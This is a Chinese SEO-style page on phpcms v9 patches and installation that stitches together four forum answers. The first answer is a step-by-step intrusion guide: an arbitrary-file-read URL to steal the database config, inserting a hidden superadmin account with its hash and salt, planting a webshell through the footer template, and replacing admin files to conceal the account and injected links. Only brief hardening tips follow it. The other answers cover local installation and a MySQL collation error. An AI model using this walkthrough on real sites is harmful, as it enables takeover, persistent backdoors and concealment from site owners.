phpcmsv9补丁(phpcms v9安装教程)

本篇文章给大家谈谈phpcmsv9补丁，以及phpcms v9安装教程对应的知识点，希望对各位有所帮助，不要忘了收藏本站喔。

本文目录一览：

• 1、服务器装什么软件 phpcms注入漏洞
• 2、菜鸟跪求PHPCMS v9怎么本地安装？
• 3、如何彻底解决phpcms v9升级后文章发布出现Mysql 1267错误
• 4、安装PHPCMS v9 到配置数据库时出错 实在本机LAMP虚拟机上运行测试的

1、服务器装什么软件 phpcms注入漏洞

本文利用了PHPCMS V9的两个漏洞，一个是读取任意文件漏洞，另一个是模版运行php脚本漏洞。使用到的工具：Navicat for Mysql/IE浏览器(建议使用代理)/湛蓝v9代码包（包含文中使用到的所有文件、代码和木马）

1、放置data.txt以备在目标站点读取并在目标站点生成PHP木马脚本使用。

例如将data.txt放置在yun.baidu.com/j0192/data.txt

2、通过v9漏洞获取配置信息（请参阅：phpcms V9最新读取站点任意文件漏洞）。

/index.php?m=searchc=indexa=public_get_suggest_keywordurl=asdfq=../../phpsso_server/caches/configs/database.php

3、通过v9系统漏洞获取到的数据库信息远程登陆目标站点数据库，在v9_admin和v9_sso_admin表中添加账号

username字段：admn

password字段：10203d4623c1957d041818196ff9822a

encrypt 字段：bGV22e

issuper 字段: 1

4、通过数据库添加管理员账号后使用以下用户名密码在后台登陆，然后修改当前用户密码。

用户名：admn

密码：123456

5、ctrl+a复制write.php全部内容粘贴进v9默认模版下的footer.html保存，然后点击footer.html的可视化运行该模版中的脚本，到此时就完成在目标站点生成木马脚本。

6、打开ifeng.com/caches/caches_template/default/wap/data.class.php

用户名：admin

密码：admin

7、隐藏新增加的管理员。

通过木马脚本上传替换/phpcms/modules/admin/admin_manage.php(默认匹配%admn%)，然后登陆目标站点后台查看管理员列表是否还有用户名为admn的超级管理员，如果没有则表明我们完成了新加管理员的隐藏。

8、隐藏新增加的关联链接

通过木马脚本上传替换/phpcms/modules/admin/keylink.php((默认匹配%skyhome%))

9、将目标网站的漏洞修复，以防其他黑客入侵。

通过木马脚本上传替换/phpcms/modules/search/index.php

防黑参考:

1、关闭数据库远程访问。

2、静态文件及附件等文件目录禁止执行权限。

3、脚本文件目录禁止写权限。

4、系统后台等重要目录限制IP访问。

5、及时关注开源系统官方补丁升级和乌云、sebug等漏洞发布平台，修复系统漏洞。

2、菜鸟跪求PHPCMS v9怎么本地安装？

1、先到phpmyadmin中新建 phpcmsv9 的数据库

2、数据库名：root 密码为空 （这样可以成功，但相信不是最好的方法）

3、后台登陆账户密码同为：phpcms

3、如何彻底解决phpcms v9升级后文章发布出现Mysql 1267错误

彻底解决phpcms

v9升级后,文章发布出现：MySQL

Query

:

SELECT

*

FROM

`withli_a`.`v9_keyword`

WHERE

`keyword`

=

'吼吼'

AND

`siteid`

=

'1'

LIMIT

1

MySQL

Error

:

Illegal

mix

of

collations

(latin1_swedish_ci,IMPLICIT)

and

(gbk_chinese_ci,COERCIBLE)

for

operation

'='

MySQL

Errno

:

1267

Message

:

Illegal

mix

of

collations

(latin1_swedish_ci,IMPLICIT)

and

(gbk_chinese_ci,COERCIBLE)

for

operation

'='

（上面这个错误代码是phpcms

v9中出现的）

出现上面的错误，是数据库字符集不一致的问题。

解决办法，进phpmyadmin里面执行SQL语句：

修改表的编码：

ALTER

TABLE

`v9_keyword`

DEFAULT

CHARACTER

SET

gbk

COLLATE

gbk_chinese_ci

修改字段的编码：

ALTER

TABLE

`v9_keyword

`

CHANGE

`keyword

`

`keyword

`

CHAR(

100

)

CHARACTER

SET

gbk

COLLATE

gbk_chinese_ci

NOT

NULL

然后就可以了.

4、安装PHPCMS v9 到配置数据库时出错 实在本机LAMP虚拟机上运行测试的

你要知道你mysql的账号，你要是配置wamp5环境的话，账号就是mysql。你打开mysql控制界面，输入“create database 库名；”，分号是一定要的，或者你直接用默认的数据库名mysql也是可以的，你输入“show database ”也是可以看到这一库名的。就可以连接并且创建成功了。个人经验，我也是碰到这样的问题，后来弄好了

phpcmsv9补丁的介绍就聊到这里吧，感谢你花时间阅读本站内容，更多关于phpcms v9安装教程、phpcmsv9补丁的信息别忘了在本站进行查找喔。